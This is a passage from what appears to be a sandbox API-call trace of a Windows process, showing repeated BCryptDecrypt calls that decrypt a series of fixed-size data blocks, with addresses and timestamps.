pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2033db4, pcbResult=0x14f8fc) returned 0x0 [0171.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.415] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6f1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2033ea9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2033ea9, pcbResult=0x14f8fc) returned 0x0 [0171.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.417] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6f2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2033f9e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2033f9e, pcbResult=0x14f8fc) returned 0x0 [0171.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.418] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6f3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2034093, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2034093, pcbResult=0x14f8fc) returned 0x0 [0171.420] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.421] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6f4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2034188, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2034188, pcbResult=0x14f8fc) returned 0x0 [0171.422] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.422] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6f5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203427d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203427d, pcbResult=0x14f8fc) returned 0x0 [0171.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.423] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6f6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2034372, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2034372, pcbResult=0x14f8fc) returned 0x0 [0171.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.425] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6f7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2034467, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2034467, pcbResult=0x14f8fc) returned 0x0 [0171.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.426] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6f8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203455c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203455c, pcbResult=0x14f8fc) returned 0x0 [0171.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.428] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6f9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2034651, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2034651, pcbResult=0x14f8fc) returned 0x0 [0171.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.429] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6fad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2034746, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2034746, pcbResult=0x14f8fc) returned 0x0 [0171.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.431] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6fbd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203483b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203483b, pcbResult=0x14f8fc) returned 0x0 [0171.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.432] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6fcd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2034930, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2034930, pcbResult=0x14f8fc) returned 0x0 [0171.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.433] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6fdd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2034a25, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2034a25, pcbResult=0x14f8fc) returned 0x0 [0171.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.435] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6fed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2034b1a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2034b1a, pcbResult=0x14f8fc) returned 0x0 [0171.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.437] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6ffd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2034c0f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2034c0f, pcbResult=0x14f8fc) returned 0x0 [0171.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.438] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e700d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2034d04, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2034d04, pcbResult=0x14f8fc) returned 0x0 [0171.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.440] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e701d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2034df9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2034df9, pcbResult=0x14f8fc) returned 0x0 [0171.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.441] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e702d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2034eee, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2034eee, pcbResult=0x14f8fc) returned 0x0 [0171.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.443] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e703d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2034fe3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2034fe3, pcbResult=0x14f8fc) returned 0x0 [0171.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.444] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e704d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20350d8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20350d8, pcbResult=0x14f8fc) returned 0x0 [0171.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.445] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e705d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20351cd, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20351cd, pcbResult=0x14f8fc) returned 0x0 [0171.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.447] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e706d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20352c2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20352c2, pcbResult=0x14f8fc) returned 0x0 [0171.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.604] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e707d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20353b7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20353b7, pcbResult=0x14f8fc) returned 0x0 [0171.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.607] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e708d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20354ac, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20354ac, pcbResult=0x14f8fc) returned 0x0 [0171.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.609] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e709d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20355a1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20355a1, pcbResult=0x14f8fc) returned 0x0 [0171.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.612] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e70ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2035696, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2035696, pcbResult=0x14f8fc) returned 0x0 [0171.615] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.615] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e70bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203578b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203578b, pcbResult=0x14f8fc) returned 0x0 [0171.618] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.618] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e70cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2035880, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2035880, pcbResult=0x14f8fc) returned 0x0 [0171.620] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.620] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e70dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2035975, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2035975, pcbResult=0x14f8fc) returned 0x0 [0171.623] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.623] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e70ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2035a6a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2035a6a, pcbResult=0x14f8fc) returned 0x0 [0171.625] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.625] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e70fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2035b5f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2035b5f, pcbResult=0x14f8fc) returned 0x0 [0171.628] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.628] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e710d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2035c54, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2035c54, pcbResult=0x14f8fc) returned 0x0 [0171.630] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.631] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e711d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2035d49, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2035d49, pcbResult=0x14f8fc) returned 0x0 [0171.633] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.633] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e712d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2035e3e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2035e3e, pcbResult=0x14f8fc) returned 0x0 [0171.635] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.636] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e713d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2035f33, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2035f33, pcbResult=0x14f8fc) returned 0x0 [0171.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.851] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e714d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2036028, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2036028, pcbResult=0x14f8fc) returned 0x0 [0171.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.853] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e715d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203611d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203611d, pcbResult=0x14f8fc) returned 0x0 [0171.856] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.856] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e716d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2036212, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2036212, pcbResult=0x14f8fc) returned 0x0 [0171.859] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.859] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e717d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2036307, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2036307, pcbResult=0x14f8fc) returned 0x0 [0171.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.861] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e718d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20363fc, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20363fc, pcbResult=0x14f8fc) returned 0x0 [0171.865] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.865] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e719d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20364f1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20364f1, pcbResult=0x14f8fc) returned 0x0 [0171.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.868] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e71ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20365e6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20365e6, pcbResult=0x14f8fc) returned 0x0 [0171.870] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.870] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e71bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20366db, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20366db, pcbResult=0x14f8fc) returned 0x0 [0171.873] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.873] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e71cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20367d0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20367d0, pcbResult=0x14f8fc) returned 0x0 [0171.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.875] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e71dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20368c5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20368c5, pcbResult=0x14f8fc) returned 0x0 [0171.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.878] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e71ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20369ba, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20369ba, pcbResult=0x14f8fc) returned 0x0 [0171.880] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.880] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e71fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2036aaf, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2036aaf, pcbResult=0x14f8fc) returned 0x0 [0171.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.883] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e720d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2036ba4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2036ba4, pcbResult=0x14f8fc) returned 0x0 [0172.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.107] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e721d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2036c99, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2036c99, pcbResult=0x14f8fc) returned 0x0 [0172.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.109] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e722d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2036d8e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2036d8e, pcbResult=0x14f8fc) returned 0x0 [0172.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.111] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e723d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2036e83, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2036e83, pcbResult=0x14f8fc) returned 0x0 [0172.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.114] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e724d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2036f78, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2036f78, pcbResult=0x14f8fc) returned 0x0 [0172.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.116] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e725d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203706d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203706d, pcbResult=0x14f8fc) returned 0x0 [0172.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.118] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e726d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2037162, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2037162, pcbResult=0x14f8fc) returned 0x0 [0172.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.121] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e727d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2037257, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2037257, pcbResult=0x14f8fc) returned 0x0 [0172.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.123] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e728d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203734c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203734c, pcbResult=0x14f8fc) returned 0x0 [0172.125] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.125] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e729d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2037441, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2037441, pcbResult=0x14f8fc) returned 0x0 [0172.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.127] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e72ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2037536, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2037536, pcbResult=0x14f8fc) returned 0x0 [0172.129] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.129] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e72bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203762b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203762b, pcbResult=0x14f8fc) returned 0x0 [0172.131] GetProcAddress (hModule=0x7ffc5bcc0000, 